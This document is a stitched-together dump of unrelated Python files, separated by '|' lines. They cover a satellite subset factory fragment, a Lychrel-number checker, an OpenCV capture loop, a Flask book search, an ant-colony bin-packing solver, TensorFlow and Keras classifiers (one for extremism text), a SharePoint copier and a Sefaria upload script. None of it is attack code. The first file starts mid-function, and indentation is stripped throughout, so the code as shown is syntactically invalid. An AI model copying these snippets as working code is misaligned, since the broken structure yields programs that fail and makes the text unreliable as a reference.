# todo - Write specific subset factory for SY_1_SYN type products?
return SnappySubsetFactory
# Synergy - Surface reflectances and aerosol parameters over land
if product_string == "SY_2_SYN":
# todo - Write specific subset factory for SY_2_SYN type product?
return SnappySubsetFactory
# Synergy - 1 km vegetation like product
if product_string == "SY_2_VEG":
# todo - Write specific subset factory for SY_2_VEG type products?
return SnappySubsetFactory
return None
if __name__ == "__main__":
pass
|
__author__ = 'subin'
class Palindrome():
def Check_palindrome(self, IntegerValue):
IntegerValue = str(IntegerValue)
LenOfInteger = len(IntegerValue)
Half_length = LenOfInteger/2
if LenOfInteger < 2:
return 0
elif LenOfInteger%2 == 0:
for i in range(0, Half_length):
if int(IntegerValue[i]) == int(IntegerValue[(LenOfInteger-1)-i]):
Flag = 1
else:
Flag = 2
return Flag
else:
for i in range(0, Half_length):
if int(IntegerValue[i]) == int(IntegerValue[(LenOfInteger-1)-i]):
Flag = 1
else:
Flag = 2
return Flag
return Flag
def Check_lychrel(self, IntegerValue):
IntegerValue = str(IntegerValue)
Rev_Integervalue = IntegerValue[::-1]
Value = int(IntegerValue) + int(Rev_Integervalue)
return Value
IntegerValue = raw_input('Enter your Integer:')
Palindrome_obj = Palindrome()
if Palindrome_obj.Check_palindrome(IntegerValue) == 0:
print 'Error: Please Enter a \'2\' digit number.\n','------------------------------------------------------------'
elif Palindrome_obj.Check_palindrome(IntegerValue) == 1:
print IntegerValue, 'is a natural palindrome\n','------------------------------------------------------------'
else:
New_IntegerValue = Palindrome_obj.Check_lychrel(IntegerValue)
for i in range(1, 61):
if Palindrome_obj.Check_palindrome(New_IntegerValue) == 2:
IntegerValue_1 = Palindrome_obj.Check_lychrel(New_IntegerValue)
else:
print 'Yeild a palindrome {0} in {1} iteration using \'196\' algorithm.'.format(New_IntegerValue, i),'\n------------------------------------------------------------'
break
if Palindrome_obj.Check_palindrome(New_IntegerValue) == 2:
print IntegerValue, 'is a LYCHREL NUMBER.\n', '------------------------------------------------------------'
|
import cv2
import re
import os
import time
URL = "http://vrl-shrimp.cv:5000/video_feed"
video = cv2.VideoCapture(URL)
# 保存先フォルダ内の既存の画像枚数をカウントし,開始番号を決定
save_folder = "/Users/kubo/ex/python/shrimp_pool/JPEGImages/"
dir = os.chdir(save_folder)
files = os.listdir(dir)
cnt = 0
for file in files:
index = re.search('.jpg', file)
if index:
cnt = cnt + 1
while True:
ret, img = video.read()
if not img == None:
cv2.imshow("Stream Video",img)
key = cv2.waitKey(1) & 0xff
if key == ord('q'): break
if key == ord('s') and not img == None:
cnt_zero = str(cnt).zfill(5) #0うめ
print(save_folder + cnt_zero + ".jpg")
cv2.imwrite(save_folder + cnt_zero + ".jpg", img, [cv2.IMWRITE_JPEG_QUALITY, 100])
cnt = cnt + 1
|
from md_statistics import *
from md_unit_converter import *
from math import pi
class MDGeometry:
def __init__(self, md):
self.md = md
self.unit_converter = MDUnitConverter(md)
self.md_statistics = MDStatistics(md, self.unit_converter)
def create_spheres(self, num_spheres, r_min, r_max, x_max, y_max, z_max):
num_nodes = self.nodes_x*self.nodes_y*self.nodes_z
self.run_command("%s -O3 program/create_spheres/create_spheres.cpp -o create_spheres" % self.compiler)
self.run_command("./create_spheres %d %d %f %f %f %f %f" % (num_nodes, num_spheres, r_min, r_max, x_max, y_max, z_max))
def create_cylinders(self, radius = 0.45, num_cylinders_per_dimension = 1):
system_length = self.md_statistics.calculate_system_length()
num_nodes = self.md.nodes_x*self.md.nodes_y*self.md.nodes_z
max_length = max(system_length[0], system_length[1])
print "System length: ", system_length
radius = radius*max_length
self.md.run_command("%s -O3 program/create_cylinder/create_cylinder.cpp -o create_cylinder" % self.md.compiler)
self.md.run_command("./create_cylinder "+str(num_nodes)+" "+str(radius)+" "+str(num_cylinders_per_dimension)+" "+str(system_length[0])+" "+str(system_length[1])+" "+str(system_length[2]))
volume = system_length[2]*num_cylinders_per_dimension**2*pi*radius**2
self.md_statistics.update_new_volume(volume=volume) |
from flask_restful import Resource,reqparse
from flask import Flask,abort,request
import config
import helpers
class CheckHealth(Resource):
def get(self):
return {"status":"Hey Geek, Im Up and running "}
class SearchBooks(Resource):
def get(self):
args = request.args
Url = "%s%s"%(config.EndpointURL,args.get('book'))
responsestatus,response = helpers.GetResponsefromAPICall(Url)
if responsestatus == 200:
return response
else :
return abort(400, 'Unable to process the requests')
|
from datetime import *
class Term:
__instantiated = False
def __init__(self, term_start, term_end, holidays_start, holidays_end, day_offs=None):
if not self.instantiated():
self.instantiate()
self.term_start = term_start
self.term_end = term_end
self.holidays_start = holidays_start
self.holidays_end = holidays_end
self.day_offs = day_offs
self.observers = []
# self.display_term()
else:
print('Updating...')
self.update_term(term_start, term_end, holidays_start, holidays_end)
# self.notify_observers()
@classmethod
def instantiated(cls):
return cls.__instantiated
@classmethod
def instantiate(cls):
# print('Instantiating ' + str(cls))
cls.__instantiated = True
def add_observer(self, observer):
self.observers.append(observer)
def push_update(self):
for observer in self.observers:
observer.update()
def update_term(self, term_start, term_end, holidays_start, holidays_end, day_offs=None):
# TODO: Loop through db and update records that have changed.
# for arg in args:
# TODO: strategy design pattern method for field update instead.
# print('Implementation...')
if self.term_start != term_start:
self.term_start = term_start
if self.term_end != term_end:
self.term_end = term_end
if self.holidays_start != holidays_start:
self.holidays_start = holidays_start
if self.holidays_end != holidays_end:
self.holidays_end = holidays_end
if self.day_offs != day_offs:
self.day_offs = day_offs
def display_term(self):
print('Semester starts: {}\nSemester ends: {}\nHolidays start: {}\nHolidays end: {}'
.format(self.term_start, self.term_end, self.holidays_start, self.holidays_end))
def return_term_start(self):
return self.term_start
def return_term_end(self):
return self.term_end
def return_holidays_start(self):
return self.holidays_start
def return_holidays_end(self):
return self.holidays_end
def return_day_offs(self):
return self.day_offs
# def make(self, day_from, day_to):
# day_from = day_to
#
# def __call__(self, *args, **kwargs):
# print('Call method ran')
class SummerTerm(Term):
pass
class WinterTerm(Term):
pass
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 1 18:41:42 2020
@author: abhishekhegde
"""
from itertools import combinations
from scipy import sparse
import numpy as np
import random
from random import randint
import copy
import binpacking
import pandas as pd
### Bin packing problem parameters ###
x = pd.read_csv('u250_00.csv',header=None)
#x = [442,252,252,252,252,252,252,252,127,127,127,127,127,106,106,106,106,85,84,46,37,37,12,12,12,10,10,10,10,10,10,9,9]
weight = np.uint64(np.array(x))
n=len(weight)
capacity = 150
### Ant colony algorithm parameters ###
iteration = 1000
ant_num = 10
beta = 6
rou = 0.95
rot = 0
fit_k= 2
df = pd.DataFrame([])
def Rwheel(prob,i=1):
x=np.random.choice(len(prob), i,replace=False,p=prob)
if(i==1):
return x[0]
else:
return x
def check_inter(x):
if(len(x)==2):
return 1
else:
return 0
def array_row_intersection(a,b):
tmp=np.prod(np.swapaxes(a[:,:,None],1,2)==b,axis=2)
return a[np.sum(np.cumsum(tmp,axis=0)*tmp==1,axis=1).astype(bool)]
############# Define min tau ################################
min_tau = 1/ (1 - rou)
############# Pheromone matrix initialisation #################################
ph_mat = pd.DataFrame(min_tau,columns=np.unique(x), index=np.unique(x))
############# Define ant properties ############################
class ant_class:
# ANT LIST , FITNESS , PBEST , bins
def fitness_func(self):
sum = 0
for i in range(len(self.items)):
sum = sum + (np.sum(weight[self.items[i]])/ capacity) ** fit_k
self.Fitness = sum/len(self.items)
def weight(self):
self.bin_w =[]
for i in range(len(self.items)):
temp =[weight[x] for x in self.items[i]]
self.bin_w.append(np.sum(temp))
############################ Main ###########################################
ant = ant_class()
w = np.array(weight)
time =0
Gbest = 0;
while(time < iteration):
Pbest = 0;
for i in range(ant_num):
rand_post = random.randint(0,len(weight)-1)
unvisit_wt = list(range(len(weight)))
#print(rand_post)
###### Each ant computing one complete solution to the bin packing problem ######
ant.items = [[rand_post]]
ant.weight()
#print(ant.bin_w)
bin_count = 0
unvisit_wt.remove(rand_post)
for uv_id in range(len(weight)-1):
remaining = capacity - ant.bin_w[bin_count]
subspace = [unvisit_wt[i] for i in range(len(unvisit_wt)) if (weight[unvisit_wt[i]] <= remaining)]
if(len(subspace) == 0):
bin_count = bin_count+1
ant.items.append([])
remaining = capacity
subspace = [unvisit_wt[i] for i in range(len(unvisit_wt)) if (weight[unvisit_wt[i]] <= remaining)]
num_sum = []
denom_sum = 0
for sub_i in range(len(subspace)):
temp_num_sum = 0
if(len(ant.items[bin_count]) != 0):
for j in (ant.items[bin_count]):
temp = [subspace[sub_i],j]
temp_w = weight[temp]
temp_w.sort()
temp_num_sum = temp_num_sum + ph_mat.at[int(temp_w[0]),int(temp_w[1])]
# print(temp_num_sum)
# print(weight[subspace[sub_i]])
num_sum.append((temp_num_sum/len(ant.items[bin_count]))*((weight[subspace[sub_i]])**beta))
denom_sum = denom_sum + num_sum[sub_i]
else:
num_sum.append(1*(weight[subspace[sub_i]]**beta))
denom_sum = denom_sum + num_sum[sub_i]
#print(num_sum,denom_sum)
num_sum = [ float(i) for i in num_sum ]
denom_sum = sum(num_sum)
# prob_fill = np.divide(num_sum,np.sum(num_sum))
prob_fill = list((map(lambda x: x/denom_sum,num_sum)))
fill_index = Rwheel(prob_fill)
#fill_index = np.argmax(prob_fill)
ant.items[bin_count].append(subspace[fill_index])
ant.weight()
unvisit_wt.remove(subspace[fill_index])
#print(ant.items)
ant.fitness_func()
#print(ant.Fitness)
## Computing the personal best solution of the individual ants
if(ant.Fitness > Pbest):
# print(time)
Pbest = copy.deepcopy(ant.Fitness)
# print(Pbest)
Pbest_items = copy.deepcopy(ant.items)
# print(ant.items)
## Computing the global best solution
if(Pbest>Gbest):
#print("Gbest" , time)
Gbest = copy.deepcopy(Pbest)
Gbest_items = copy.deepcopy(Pbest_items)
############################## Updation of Pheromine at the end of one iteration ################################################
if(rot<500/n):
fit_g = Pbest
rot = rot+1
d = Pbest_items
else:
fit_g = Gbest
rot = 0
d = Gbest_items
ph_mat.loc[:,:]= ph_mat.loc[:,:]*(rou)
x_comb = []
for i in range(len(d)):
y_comb = copy.deepcopy(x_comb)
for j in range(i,len(d)):
comb = combinations(weight[d[i]], 2)
for k in comb:
inter = np.intersect1d(k,weight[d[j]])
# print(k)
if(len(inter)==2):
if(len(inter)==2):
if(k not in y_comb):
k_s = np.array([int(k[0]),int(k[1])])
k_s.sort()
# print(k_s)
# print("Before", ph_mat.loc[k_s[0],k_s[1]])
ph_mat.loc[k_s[0],k_s[1]] = ph_mat.loc[k_s[0],k_s[1]] + (1*fit_g)
# print("After",ph_mat.loc[k_s[0],k_s[1]])
x_comb.append(k)
t_min = min_tau * (1-(0.05**1/n))/(((n/2)-1)*(1-(0.05**1/n)))
# print(t_min)
ph_mat[ph_mat < t_min]= t_min
### Displaying the results
df = df.append([{'Iteration':time,'P_Bins':len(Pbest_items),'Person_Fitness':round(Pbest,4),'G_Bins':len(Gbest_items),'Global_Fitness':round(Gbest,4)}],ignore_index=True)
time = time + 1
print('Gen:',time)
print(len(Pbest_items))
print(len(Gbest_items))
### Logging of the results to excel file
with pd.ExcelWriter('ACO.xlsx') as writer:
df.to_excel(writer,'ACO') |
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def W_sparse(dim, times):
import numpy as np
tp = range(dim) * times
idx = np.row_stack((range(dim * times), np.random.permutation(tp))).transpose().tolist()
return tf.SparseTensor(indices=idx, values=[1.0] * (dim * times), shape=[dim * times, dim])
sess = tf.InteractiveSession()
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
x_image = tf.reshape(x, [-1,28,28,1])
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_pool2_trans = tf.transpose(h_pool2_flat)
W_sp = W_sparse(7*7*64, 3);
h_pool2_rand = tf.sparse_tensor_dense_matmul(W_sp, h_pool2_trans)
h_pool2_rand_trans = tf.reshape(tf.transpose(h_pool2_rand), [-1, 7*7*64*3, 1, 1])
W_conv3 = weight_variable([17, 1, 1, 1])
b_conv3 = bias_variable([1])
tp_conv3 = tf.nn.conv2d(h_pool2_rand_trans, W_conv3, strides=[1, 5, 1, 1], padding='SAME') + b_conv3
h_conv3 = tf.nn.relu(tp_conv3)
h_pool3 = tf.nn.avg_pool(h_conv3, [1, 11, 1, 1], strides=[1, 3, 1, 1], padding='SAME')
fc_in = tf.reshape(h_pool3, [-1, 628])
#xx = h_pool2_rand_trans.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels})
#tp1 = tp_conv3.eval(feed_dict={h_pool2_rand_trans: xx})
#hc3 = h_conv3.eval(feed_dict={tp_conv3: tp1})
#hp3 = h_pool3.eval(feed_dict={h_conv3: hc3})
#keep_prob = tf.placeholder(tf.float32)
#h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
#
W_fc2 = weight_variable([628, 10])
b_fc2 = bias_variable([10])
y_conv=tf.nn.softmax(tf.matmul(fc_in, W_fc2) + b_fc2)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sess.run(tf.initialize_all_variables())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i%100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x:batch[0], y_: batch[1]})
print("step %d, training accuracy %g"%(i, train_accuracy))
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
print("test accuracy %g"%accuracy.eval(feed_dict={
x: mnist.test.images, y_: mnist.test.labels}))
|
import os
import glob
import shutil
import time
import datetime
# create folder with the current date/time as the name (eg. '25 sep 1400'), to copy the files daily
today = datetime.datetime.today()
date = today.strftime('%d')
month = today.strftime('%b').lower()
t = today.strftime('%H')
folder_name = f'{date} {month} {t}00'
# the sharepoint area, where the files need to be copied from, is mapped as a network drive (S:/)
src_dir = 'S:/'
dst_dir = 'G:/TPD/FC/CRM/RNB/RNB2021/RNB-files/Files from Sharepoint/' + folder_name
# src_dir = 'C:/Users/nabm/Desktop/test_files'
# dst_dir = 'G:/TPD/FC/CRM/RNB/RNB2021/RNB-files/Files from Sharepoint/' + 'test'
# files to ignore during copying
ignore_files = ['Hanz_RNB2021.xlsm', 'Ivar Aasen_RNB2021.xlsm']
# make destination directory
os.mkdir(dst_dir)
# change current working directory to source directory
os.chdir(src_dir)
# initiate copied files counter
count = 0
# initial time
t0 = time.perf_counter()
# loop through the files in the source directory, and copy files matching a specific glob pattern
for file in glob.iglob('*/RNB2021/*_RNB2021.xlsm'):
if file.strip().split("\\")[-1] in ignore_files:
continue
else:
while True:
try:
shutil.copy(file, dst_dir)
except PermissionError:
print(f"Permission denied to file: {file}. Will try again in 15 seconds...")
time.sleep(15)
continue
else:
print(f"{file} copied.")
count += 1
break
# final time
t1 = time.perf_counter()
time_secs = round(t1-t0, 0)
time_mins = round((t1-t0)/60, 1)
# display key information from program
print(f"\n{count} files were matched and copied to destination.")
print(f"It took {time_mins} minutes ({time_secs} seconds) to copy the files.") |
# https://leetcode-cn.com/problems/di-yi-ge-zhi-chu-xian-yi-ci-de-zi-fu-lcof/
# 剑指 Offer 50. 第一个只出现一次的字符
from collections import Counter
# 用哈续表存储频数
class Solution:
def firstUniqChar(self, s: str) -> str:
d = {}
for i in s:
d[i] = 2 if i in d else 1
for i in s:
if d[i] == 1:
return i
return ' '
# 使用 collection 的 counter
class Solution2:
def firstUniqChar(self, s: str) -> str:
cnt = Counter(s)
for v in s:
if cnt[v] == 1:
return v
return ' '
|
#!/usr/bin/env python
# !-*- coding:utf-8 -*-
import json
Code_ERROR = "0" # 错误
Code_OK = "1" # 成功
class ResartInfo(object):
def __init__(self):
self.code = Code_OK
self.msg = "ok"
self.failList = []
def json(self):
"""JSON format data."""
json = {
'code': self.code,
'msg': self.msg,
'failList': self.failList,
}
return json
def setCode(self, code=1):
self.code = code
return self
def setMsg(self, msg="ok"):
self.msg = msg
return self
def setfailList(self, list=[]):
self.failList = list
return self
def getCode(self):
return self.code
def getMsg(self):
return self.msg
def getFailList(self):
return self.failList
def getResartInfo(self):
return self
def getInstance():
return ResartInfo()
|
import csv
from django.contrib.auth.models import User
header = ('id', 'username', 'email', 'date_joined')
users = User.objects.all().values_list(*header)
with open('io/csv/users.csv', 'w') as csvfile:
user_writer = csv.writer(csvfile)
user_writer.writerow(header)
for user in users:
user_writer.writerow(user)
|
import django
django.setup()
from sefaria.model import *
import re
from sources.functions import getGematria, post_text, post_index, post_link
import requests
from linking_utilities.dibur_hamatchil_matcher import match_ref
from sefaria.utils.talmud import section_to_daf
#SERVER = 'http://localhost:9000'
SERVER = 'https://maharsha.cauldron.sefaria.org'
Y, A = 0, 0
def find_dh(dh, daf):
talmud = Ref(f'Eruvin {daf}').text('he', vtitle='Wikisource Talmud Bavli')
return match_ref(talmud, [dh], base_tokenizer=lambda x: x.split())['matches'][0]
book = 'Rav Nissim Gaon on Eruvin'
with open('ranag.txt', encoding='utf-8') as fp:
data = fp.read()
pages = []
links = []
data, notes = data.split('**')
notes = re.findall('\*(.*?)\n', notes)
while '*' in data:
data = data.replace('*', f'<sup>$</sup><i class="footnote">{notes.pop(0).strip()}</i>', 1)
data = data.replace('$', '*')
data = data.split('\n')
old_sec = -1
twice = False
for line in data:
line = ' '.join(line.split())
if not line:
continue
loc = re.findall(f'רב ניסים גאון מסכת עירובין דף (.*?) עמוד ([אב])', line)
if loc:
daf, amud = loc[0]
sec = getGematria(daf) * 2 + getGematria(amud) - 3
if sec == old_sec:
if twice:
skip = True
twice = True
else:
skip, twice = False, False
old_sec = sec
continue
if skip:
continue
pages += [[] for _ in range(sec+1-len(pages))]
pages[sec].append(line)
for p, page in enumerate(pages):
if not page:
continue
if not page[-1].endswith(':'):
try:
next_page = [l for l in pages[p+1:] if l!=[]][0]
except IndexError:
continue
next_ind = pages.index(next_page)
if ':' not in next_page[0]:
print('no :', next_page[0])
continue
prev, next = next_page[0].split(':')
page[-1] += f' {prev}:'
next_page[0] = next.strip()
if not next_page[0]:
next_page.pop(0)
pages[next_ind] = next_page
for sec, page in enumerate(pages):
for seg, comm in enumerate(page):
if '.' in comm:
dh, comm = comm.split('.', 1)
pages[sec][seg] = f'<b>{dh}.</b>{comm}'
daf = section_to_daf(sec+1)
talmud = find_dh(dh, daf)
A += 1
if talmud:
Y += 1
links.append({'refs': [talmud.tref, f'{book} {daf}:{seg+1}'],
'generated_by': 'r. nissim gaon eruvin',
'type': 'Commentary',
'auto': True})
ind = requests.request('get', 'https://sefaria.org/api/v2/raw/index/Rav_Nissim_Gaon_on_Shabbat').json()
ind['title'] = ind['schema']['titles'][1]['text'] = ind['schema']['key'] = book
ind['schema']['titles'][0]['text'] = 'רב נסים גאון על מסכת עירובין'
ind['base_text_titles'] = ['Eruvin']
post_index(ind, server=SERVER)
text_version = {
'versionTitle': 'Vilna Edition',
'versionSource': 'http://primo.nli.org.il/primo-explore/fulldisplay?vid=NLI&docid=NNL_ALEPH001300957&context=L',
'language': 'he',
'text': pages
}
post_text(book, text_version, server=SERVER, index_count='on')
post_link(links, server=SERVER)
print(Y, A)
|
import time
from contextlib import contextmanager
import gc
gc.collect()
@contextmanager
def timer(name):
t0 = time.time()
yield
print("\n\n" + name + ' done in ' + str(round(time.time() - t0)) + 's \n')
print("\n\nStarting\n\n")
with timer("Importing and setting up libraries"):
import os
import csv
import math
import numpy as np
import nltk
from nltk.corpus import stopwords
import collections
import string
import re
from sklearn.model_selection import KFold
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
import time
import pickle
from nltk.corpus import words
import sys
from keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, GRU
from sklearn.metrics import precision_recall_fscore_support
from keras import backend
import tensorflow
cachedStopWords = stopwords.words("english")
allEnglishWords = words.words()
allEnglishWords[:] = [x.lower() for x in allEnglishWords]
config = tensorflow.ConfigProto( device_count = {'GPU': 1 , 'CPU': 8} )
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 1
sess = tensorflow.Session(config=config)
backend.set_session(sess)
def clean(s):
transalator = str.maketrans("","",string.punctuation)
return s.translate(transalator)
def preprocess(text):
text = text.split(",")[-1]
text = clean(text).lower()
text=text.lower()
text = ' '.join([word for word in text.split() if word not in cachedStopWords])
text = ' '.join([word for word in text.split() if( not word.startswith("@") and not word.startswith("http") and not word.startswith("\\")) ])
text = ' '.join([word for word in text.split() if word in allEnglishWords])
#text = re.sub("[_]","",text)
#remove tags
text=re.sub("</?.*?>"," <> ",text)
# remove special characters and digits
text=re.sub("(\\d|\\W)+"," ",text)
if(text.startswith("rt ") or text.startswith(" rt")):
text = text[3:]
if(text == "rt"):
text = ""
while(text != "" and text[0] == ' '):
text = text[1:]
return text
with timer("Reading data"):
x = []
y = []
radical = []
violentExtremism = []
nonViolentExtremism = []
radicalViolence = []
nonRadicalViolence = []
posViolentExtremism = 0
posNonViolentExtremism = 0
posRadicalViolence = 0
posNonRadicalViolence = 0
with open("input.csv",'r', encoding="utf8") as csvFile:
reader = csv.reader(csvFile)
p = 0
for row in reader:
#To ignore header
if(p == 0):
p = p + 1
continue
if(len(row) >= 2):
if(row[1] == "" or row[2] == "" or row[3] == "" or row[4] == ""):
continue
s = row[0].split(',', 1)[1]
x.append(preprocess(s))
if(row[1] == "0.0"):
violentExtremism.append(0)
else:
posViolentExtremism += 1
violentExtremism.append(1)
if(row[2] == "0.0"):
nonViolentExtremism.append(0)
else:
posNonViolentExtremism += 1
nonViolentExtremism.append(1)
if(row[3] == "0.0"):
radicalViolence.append(0)
else:
posRadicalViolence += 1
radicalViolence.append(1)
if(row[4] == "0.0"):
nonRadicalViolence.append(0)
else:
posNonRadicalViolence += 1
nonRadicalViolence.append(1)
p = p + 1
csvFile.close
print("Size of x:",len(x))
print("Size of violentExtremism : ", len(violentExtremism), "\t positive : ", posViolentExtremism)
print("Size of nonViolentExtremism : ", len(nonViolentExtremism), "\t positive : ", posNonViolentExtremism)
print("Size of radicalViolence : ", len(radicalViolence), "\t positive : ", posRadicalViolence)
print("Size of nonRadicalViolence : ", len(nonRadicalViolence), "\t positive : ", posNonRadicalViolence)
# print(violentExtremism)
# print(nonViolentExtremism)
# print(radicalViolence)
# print(nonRadicalViolence)
X = []
for t in x:
t = re.sub(r'[^\w\s]',' ',t)
t = ' '.join([word for word in t.split() if word != " "])
t = t.lower()
t = ' '.join([word for word in t.split() if word not in cachedStopWords])
X.append(t)
with timer("Making tokeniser"):
vocabSize = len(allEnglishWords)
tokenizer = Tokenizer(num_words= vocabSize)
tokenised = tokenizer.fit_on_texts(allEnglishWords)
kf = KFold(n_splits=10)
Features = X
with timer("Making Variables"):
gViolentExtremismAccu = 0
gViolentExtremismPrecision = [0,0, 0]
gViolentExtremismRecall = [0,0, 0]
gViolentExtremismFScore = [0,0, 0]
gViolentExtremismEpochs = 0
gNonViolentExtremismAccu = 0
gNonViolentExtremismPrecision = [0,0, 0]
gNonViolentExtremismRecall = [0,0, 0]
gNonViolentExtremismFScore = [0,0, 0]
gNonViolentExtremismEpochs = 0
gRadicalViolenceAccu = 0
gRadicalViolencePrecision = [0,0, 0]
gRadicalViolenceRecall = [0,0, 0]
gRadicalViolenceFScore = [0,0, 0]
gRadicalViolenceEpochs = 0
gNonRadicalViolenceAccu = 0
gNonRadicalViolencePrecision = [0,0, 0]
gNonRadicalViolenceRecall = [0,0, 0]
gNonRadicalViolenceFScore = [0,0, 0]
gNonRadicalViolenceEpochs = 0
with timer("trying to clear GPU memory initially "):
backend.clear_session()
for i in range(20):
gc.collect()
with timer("Making label vector"):
YViolentExtremism = np.zeros([len(violentExtremism),3],dtype = int)
for x in range(0, len(violentExtremism)):
YViolentExtremism[x,violentExtremism[x]] = 1
YNonViolentExtremism = np.zeros([len(nonViolentExtremism),3],dtype = int)
for x in range(0, len(nonViolentExtremism)):
YNonViolentExtremism[x,nonViolentExtremism[x]] = 1
YRadicalViolence = np.zeros([len(radicalViolence),3],dtype = int)
for x in range(0, len(radicalViolence)):
YRadicalViolence[x,radicalViolence[x]] = 1
YNonRadicalViolence = np.zeros([len(nonRadicalViolence),3],dtype = int)
for x in range(0, len(nonRadicalViolence)):
YNonRadicalViolence[x,nonRadicalViolence[x]] = 1
with timer("Making Embedding_index dict"):
embeddings_index = dict()
f = open('glove.twitter.27B/glove.twitter.27B.100d.txt', encoding="utf8")
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
print('Loaded %s word vectors.' % len(embeddings_index))
with timer("Making Embedding Matrix"):
embedding_matrix = np.zeros((vocabSize, 100))
for word, index in tokenizer.word_index.items():
if index > vocabSize - 1:
break
else:
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[index] = embedding_vector
with timer("Cross Validation for Violent Extremism"):
iteration = 0
for train_index, test_index in kf.split(Features):
with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Violent Extremism"):
print("\n\n\n\nMaking nueral Network for iteration:",iteration, " for Violent Extremism")
iteration += 1
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
violentExtremismTrain = YViolentExtremism[train_index]
violentExtremismTest = YViolentExtremism[test_index]
violentExtremismTest1 = [violentExtremism[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Radical
violentExtremismModel = Sequential()
violentExtremismModel.add(Embedding(vocabSize, 100, input_length=max_review_length,weights=[embedding_matrix]))
violentExtremismModel.add(Dropout(0.2))
violentExtremismModel.add(Conv1D(64, 5, activation='relu'))
violentExtremismModel.add(MaxPooling1D(pool_size=4))
violentExtremismModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
violentExtremismModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
violentExtremismModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
violentExtremismModel.add(Dense(3, activation='sigmoid'))
violentExtremismModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
epochs = 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
fitHistory = violentExtremismModel.fit(X_Train, violentExtremismTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
while(trainingAccuracy[0] < 0.99 or epochs < 15):
epochs += 1
print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Violent Extremism")
fitHistory = violentExtremismModel.fit(X_Train, violentExtremismTrain, epochs = 1, batch_size = 150)
trainingAccuracy = fitHistory.history['acc']
if(epochs == 100):
break
violentExtremismScore = violentExtremismModel.evaluate(X_Test,violentExtremismTest,verbose = 100)
accuViolentExtremismLstm1 = violentExtremismScore[1]
print("\nViolence Extremism training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
positiveViolentExtremism = [x for x in violentExtremismTest if x[0] == 1]
predictViolentExtremism = violentExtremismModel.predict_classes(X_Test, verbose = 1)
positivePredViolentExtremism = [x for x in predictViolentExtremism if x > 0]
prec1, recall1, fscore1, support1 = precision_recall_fscore_support(violentExtremismTest1, predictViolentExtremism)
print("Number of positive Examples : ",len(positiveViolentExtremism), "\nratio : ", (len(positiveViolentExtremism) / len(violentExtremismTest)), "\nPositive Predicted : ", len(positivePredViolentExtremism), "\naccuracy : ", accuViolentExtremismLstm1, "\nwrongness : ", 1 - accuViolentExtremismLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
gViolentExtremismAccu += accuViolentExtremismLstm1
gViolentExtremismPrecision[0] += prec1[0]
try:
gViolentExtremismPrecision[1] += prec1[1]
except:
#doNothing
print("LAla")
try:
gViolentExtremismPrecision[2] += prec1[2]
except:
print("LALALALA")
gViolentExtremismRecall[0] += recall1[0]
try:
gViolentExtremismRecall[1] += recall1[1]
except:
#doNothing
print("LAla")
try:
gViolentExtremismRecall[2] += recall1[2]
except:
print("LALALALA")
gViolentExtremismFScore[0] += fscore1[0]
try:
gViolentExtremismFScore[1] += fscore1[1]
except:
#doNothing
print("LAla")
try:
gViolentExtremismFScore[2] += fscore1[2]
except:
print("LALALALA")
gViolentExtremismEpochs += epochs
with timer("trying to clear GPU memory"):
del violentExtremismModel
backend.clear_session()
for i in range(20):
gc.collect()
